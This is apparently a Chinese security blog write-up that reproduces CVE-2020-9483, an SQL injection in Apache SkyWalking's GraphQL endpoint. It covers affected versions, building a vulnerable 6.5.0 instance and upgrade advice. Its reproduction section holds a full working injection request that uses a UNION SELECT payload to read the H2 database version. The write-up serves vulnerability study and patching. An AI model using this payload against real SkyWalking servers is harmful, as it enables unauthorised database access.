Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

  • A+
所属分类:安全文章

简介

 

Apache Skywalking是一款针对分布式系统的应用程序性能监视工具,为微服务,云原生和基于容器(Docker,Kubernetes,Mesos)的体系结构而设计。

影响版本

 

Apache SkyWalking 6.0.0 to 6.6.0, 7.0.0

环境搭建

 

这里下载6.5.0进行搭建

下载地址

https://archive.apache.org/dist/skywalking/6.5.0/apache-skywalking-apm-6.5.0.tar.gz


进入bin目录并启动

cd apache-skywalking-apm-bin/bin/./startup.sh


 

Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现


访问http://your-ip:8080即可查看Skywalking的页面。

 

Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

 

漏洞复现

 

构建数据包并发送

POST /graphql HTTP/1.1Host: ip:8080Content-Type: application/json;charset=utf-8Content-Length: 313Connection: close {"query":"query queryData($duration: Duration!) {globalP99: getLinearIntValues(metric: {name: "all_p99", id: "') UNION ALL SELECT NULL,CONCAT('~', H2VERSION(), '~')--" }, duration: $duration) {  values { value } }}","variables":{"duration":{"start":"2020-08-07 1417","end":"2020-08-07 1418","step":"MINUTE"}}}


Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现


成功获取H2的版本信息

修复建议

 

升级到安全版本

下载地址

https://github.com/apache/skywalking/releases


本文始发于微信公众号(锋刃科技):Apache SkyWalking SQL注入漏洞(CVE-2020-9483)复现

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: